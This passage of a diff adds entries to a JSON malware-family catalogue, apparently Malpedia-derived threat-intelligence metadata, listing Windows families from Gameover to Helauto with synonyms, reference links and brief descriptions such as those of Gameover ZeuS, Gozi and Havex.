+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga"
+ ]
+ },
+ "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92",
+ "value": "Gameover DGA",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ZeuS P2P",
+ "GOZ"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p",
+ "https://www.wired.com/?p=2171700",
+ "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf",
+ "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf",
+ "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
+ "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf"
+ ]
+ },
+ "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f",
+ "value": "Gameover P2P",
+ "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol"
+ ]
+ },
+ "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded",
+ "value": "Gamotrol",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "GrandCrab"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
+ "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
+ "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
+ "http://asec.ahnlab.com/1145",
+ "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
+ "https://isc.sans.edu/diary/23417",
+ "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
+ "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/"
+ ]
+ },
+ "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275",
+ "value": "win.gandcrab",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox",
+ "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html"
+ ]
+ },
+ "uuid": "591b2882-65ba-4629-9008-51ed3467510a",
+ "value": "Gaudox",
+ "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only)."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss",
+ "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html"
+ ]
+ },
+ "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691",
+ "value": "Gauss",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "WhiteBear"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer",
+ "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/",
+ "https://securelist.com/introducing-whitebear/81638/",
+ "https://www.youtube.com/watch?v=Pvzhtjl86wc",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/turla"
+ ]
+ },
+ "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada",
+ "value": "Gazer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman",
+ "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/"
+ ]
+ },
+ "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e",
+ "value": "gcman",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer",
+ "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html",
+ "https://www.rekings.com/ispy-customers/"
+ ]
+ },
+ "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128",
+ "value": "GearInformer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Emotet",
+ "Heodo"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo",
+ "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
+ "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
+ "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
+ "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
+ "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
+ "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader",
+ "https://www.us-cert.gov/ncas/alerts/TA18-201A",
+ "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
+ "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
+ "https://feodotracker.abuse.ch/?filter=version_e",
+ "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
+ "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1"
+ ]
+ },
+ "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7",
+ "value": "Geodo",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a",
+ "value": "GetMail",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "getmypos"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass",
+ "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/",
+ "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html"
+ ]
+ },
+ "uuid": "d77eacf7-090f-4cf6-a305-79a372241158",
+ "value": "GetMyPass",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "CoreImpact (Modified)"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole",
+ "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/",
+ "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
+ "https://www.coresecurity.com/core-impact"
+ ]
+ },
+ "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd",
+ "value": "Ghole",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Remosh"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet",
+ "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html",
+ "https://en.wikipedia.org/wiki/GhostNet"
+ ]
+ },
+ "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd",
+ "value": "Gh0stnet",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Ghost iBot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin",
+ "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html"
+ ]
+ },
+ "uuid": "6201c337-1599-4ced-be9e-651a624c20be",
+ "value": "GhostAdmin",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "PCRat",
+ "Gh0st RAT"
+ ],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", + "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://www.malware-traffic-analysis.net/2018/01/04/index.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "http://www.hexblog.com/?p=1248", + "https://blog.cylance.com/the-ghost-dragon" + ] + }, + "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", + "value": "Ghost RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Wordpress Bruteforcer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", + "https://forum.exploit.in/pda/index.php/t102378.html" + ] + }, + "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", + "value": "Glasses", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", + "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" + ] + }, + "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", + "value": "GlassRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", + "https://blog.ensilo.com/globeimposter-ransomware-technical", + "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", + "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", + 
"https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", + "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://isc.sans.edu/diary/23417" + ] + }, + "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", + "value": "GlobeImposter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" + ] + }, + "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", + "value": "Globe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", + "value": "GlooxMail", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", + "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", + "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", + "http://resources.infosecinstitute.com/tdss4-part-1/" + ] + }, + "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", + "value": "win.glupteba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" + ] + }, + "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", + "value": "Godzilla Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", + "value": "Goggles", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Petya/Mischa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", + "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" + ] + }, + "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", + "value": "GoldenEye", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", + "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + ] + }, + "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", + "value": "GoldDragon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", + "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" + ] + }, + "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", + "value": "Golroted", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Fuerboos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" + ] + }, + "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", + "value": "Goodor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", + "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" + ] + }, + "uuid": "d1298818-6425-49be-9764-9f119d964efd", + "value": "GoogleDrive RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", + "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" + ] + }, + "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", + "value": "GooPic Drooper", + "description": "" + }, + { + "meta": { + "synonyms": [ + "talalpek", + "Xswkit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", + "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", + "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", + "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", + "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://www.youtube.com/watch?v=242Tn0IL2jE", + "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", + "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", + "https://news.drweb.com/show/?i=4338&lng=en", + "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", + "https://www.youtube.com/watch?v=QgUlPvEE4aw", + 
"https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" + ] + }, + "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", + "value": "GootKit", + "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", + "https://www.yumpu.com/en/document/view/55930175/govrat-v20" + ] + }, + "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", + "value": "GovRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CRM", + "Gozi CRM", + "Papras", + "Snifula", + "Ursnif" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", + "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", + "https://www.secureworks.com/research/gozi", + "https://lokalhost.pl/gozi_tree.txt", + "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html" + ] + }, + "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", + "value": "Gozi", + "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. 
Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", + "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", + "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", + "https://de.securelist.com/analysis/59479/erpresser/", + "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", + "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" + ] + }, + "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", + "value": "GPCode", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", + "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" + ] + }, + "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", + "value": "GrabBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", + "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" + ] + }, + "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", + "value": "Graftor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FrameworkPOS", + "trinity" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", + 
"https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" + ] + }, + "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", + "value": "Grateful POS", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", + "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + ] + }, + "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", + "value": "Gratem", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", + "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", + "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + ] + }, + "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", + "value": "Gravity RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "eoehttp" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", + "https://blog.cylance.com/spear-a-threat-actor-resurfaces" + ] + }, + "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", + "value": "GreenShaitan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", + "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + ] + }, + "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", + "value": "GROK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", + "https://attack.mitre.org/wiki/Technique/T1003" + ] + }, + "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", + "value": "gsecdump", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", + "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" + ] + }, + "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", + "value": "H1N1 Loader", + "description": "" + }, + { + 
"meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", + "value": "Hacksfase", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", + "https://github.com/ratty3697/HackSpy-Trojan-Exploit" + ] + }, + "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", + "value": "HackSpy", + "description": "Py2Exe based tool as found on github." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", + "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" + ] + }, + "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", + "value": "Hamweq", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Chanitor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", + "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", + "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + 
"https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak" + ] + }, + "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", + "value": "Hancitor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" + ] + }, + "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", + "value": "HappyLocker (HiddenTear?)", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Piptea" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", + "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", + "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" + ] + }, + "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", + "value": "Harnig", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", + "https://www.f-secure.com/weblog/archives/00002718.html" + ] + }, + "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", + "value": "Havex RAT", + "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. 
Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries." 
+ }, + { + "meta": { + "synonyms": [ + "Predator Pain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", + "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", + "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", + "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", + "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/" + ] + }, + "uuid": "31615066-dbff-4134-b467-d97a337b408b", + "value": "HawkEye Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", + "value": "Helauto", + "description": "" + 